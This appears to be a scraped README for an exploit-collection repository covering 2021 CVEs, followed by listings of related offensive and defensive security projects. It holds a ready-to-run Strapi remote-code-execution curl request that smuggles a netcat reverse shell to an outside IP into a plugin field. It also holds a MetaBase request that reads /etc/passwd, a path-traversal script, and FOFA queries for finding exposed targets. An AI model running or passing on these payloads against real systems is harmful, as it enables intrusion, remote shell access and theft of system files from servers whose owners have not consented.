Vulnerability Exploitation Code Collection Repository

Overview

[object Object]

Introduction

expbox is an exploit code collection repository

List

Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution

curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzE5NzEwLCJleHAiOjE2MzI5MTE3MTB9.AfJr81dyxnmzlutCKArmf0kBgFCcDDhsk91IYNDpTFM' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 4444 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'

CVE-2021-41349 Exchange XSS PoC

<= Exchange 2013 update 23
<= Exchange 2016 update 22
<= Exchange 2019 update 11

CVE-2021–3945 Django-helpdesk stored XSS PoC

<= 0.3.0

CVE-2021-37580 Apache ShenYu 2.3.0/2.4.0 authentication bypass

Ref: https://github.com/fengwenhua/CVE-2021-37580

Hadoop Yarn RPC RCE

Ref: https://github.com/cckuailong/YarnRpcRCE

CVE-2021-41277 MetaBase Arbitrary File Read

MetaBase < 0.40.5
1.0.0 <= MetaBase < 1.40.5

FOFA:

app="Metabase"

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

CVE-2021-42321 Exchange Post-Auth RCE

<= Exchange 2016 update 22
<= Exchange 2019 update 11

Windows 0day - InstallerFileTakeOver image

Ref:https://github.com/klinix5/InstallerFileTakeOver

CVE-2021-43557 Apache APISIX: Path traversal in request_uri variable

#/bin/bash

kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is http://127.0.0.1:9080$1 -H 'Host: app.test'

CVE-2021-43267 Linux Kernel TIPC RCE

5.10-rc1 < Linux kernel < 5.15

Reference: https://haxx.in/posts/pwning-tipc/

Nginx 0.7.0 to 1.17.9 Host injection

Ref: https://twitter.com/infosec_90/status/1464337963240861702

CVE-2021-32849 Gerapy clone background remote command execution

Gerapy <= 0.9.6

CVE-2021-41653 TP-Link TL-WR840N remote command execution

TL-WR840N(EU)_V5_171211 / 0.9.1 3.16 v0001.0 Build 171211 Rel.58800n

Fofa:

app="TP_LINK-TL-WR840N"

Ref: https://github.com/ohnonoyesyes/CVE-2021-41653

CVE-2021-41951 ResourceSpace reflective XSS

<= 9.5

Note

All content comes from the Internet, if there is a copyright problem, please contact me to delete.

Owner
0x0021h
一切都在不言中
0x0021h
Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Table of Contents Table of Contents Introduction Named-Pipes Introduction Exploitation Spraying the non-paged pool Memory Disclosure/Arbitrary Read Co

null 132 Jun 10, 2022
Violent Fungus is a command and control (C2) software suite, providing red teams post-exploitation persistence and other juicy stuff.

Violent Fungus is a command and control (C2) software suite, providing red teams post-exploitation persistence and other juicy stuff.

Chris Humphries 31 May 31, 2022
A list of excellent resources for anyone to deepen their understanding with regards to Windows Kernel Exploitation and general low level security.

WinKernel-Resources A list of excellent resources for anyone trying to deepen their understanding with regards to Windows Kernel Exploitation and gene

Vector Security 36 May 30, 2022
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors".

COBALT STRIKE 4.4 Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to exe

Trewis [work] Scotch 81 Jun 19, 2022
OverRide - Binary Exploitation and Reverse-Engineering (from assembly into C)

OverRide Explore disassembly, binary exploitation & reverse-engineering through 10 little challenges. In the folder for each level you will find: flag

Anya Schukin 66 May 18, 2022
vdk is a set of utilities used to help with exploitation of a vulnerable driver.

vdk - vulnerable driver kit vdk is a set of utilities used to help with exploitation of a vulnerable driver. There are 2 main features of this library

Pavel 7 May 30, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 406 Jun 21, 2022
struct_san is a vulnerability prevention tool that dynamically detects function pointers in kernel structures

struct_san - struct sanitizer 简介 struct_san是一个动态检测内核结构体函数指针的漏洞防御工具。业界对于结构体函数指针的保护主要集中在 Control-Flow Integrity (CFI),也就是关注在控制流上,没有关注在数据流上,例如某些CFI验证函数指针

YunDing Security Lab 19 May 6, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 406 Jun 21, 2022
Log4j Vulnerability Scanner for Windows

THIS SCRIPT IS PROVIDED TO YOU "AS IS." TO THE EXTENT PERMITTED BY LAW, QUALYS HEREBY DISCLAIMS ALL WARRANTIES AND LIABILITY FOR THE PROVISION OR USE

Qualys, Inc. 148 Jun 17, 2022
TAFuzzer: Effective and Efficient Targeted Fuzzing framework for Smart Contract Vulnerability Detection (CCS2022a Under Review).

TAFuzzer An effective and efficient targeted fuzzing framework for smart contract vulnerability detection. Requirements TAFuzzer is supported on Linux

null 2 Feb 7, 2022
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 867 Jun 17, 2022
Exploit for the pwnkit vulnerability from the Qualys team

CVE-2021-4034 Exploit for the pwnkit vulnerability from the Qualys team. This exploit assumes that gcc is present on the target machine. $ id uid=1001

Terry Chia 94 Jun 15, 2022
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.

This repository contains a personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to

null 76 Jun 22, 2022
Learn how to connect your Flexispot (LoctekMotion) desk to the internet. This repository contains a collection of scripts to get your started, combined with research and instructions.

(image source: Windows Central) Turn your LoctekMotion/FlexiSpot desk into a smart desk Recently I acquired a new standing desk from FlexiSpot. During

Mick Vleeshouwer 147 Jun 21, 2022
This repository contains a collection of 42School cursus projects in addition to the pool/piscine days

This repository contains a collection of 42School cursus projects in addition to the pool/piscine days (with a detailed step by step explanation). Enjoy!

Achraf EL Khnissi 62 Jun 26, 2022
This repository is for everyone for Hacktoberfest 2021. Anyone can contribute anything for your Swags (T- Shirt), must be relevant that can add some value to this repository.

Hacktober Fest 2021 For Everyone! Upload Projects or Different Types of Programs in any Language Use this project to make your first contribution to a

Mahesh Jain 16 Dec 21, 2021
This Repository is created to help fellow coders learn open source contributions. This Repository is created for Hacktoberfest 2021

Hacktoberfest 2021 Follow the README below to get started! This Repository is created to help fellow coders learn open source contributions This Repos

Somesh Debnath 7 Apr 26, 2022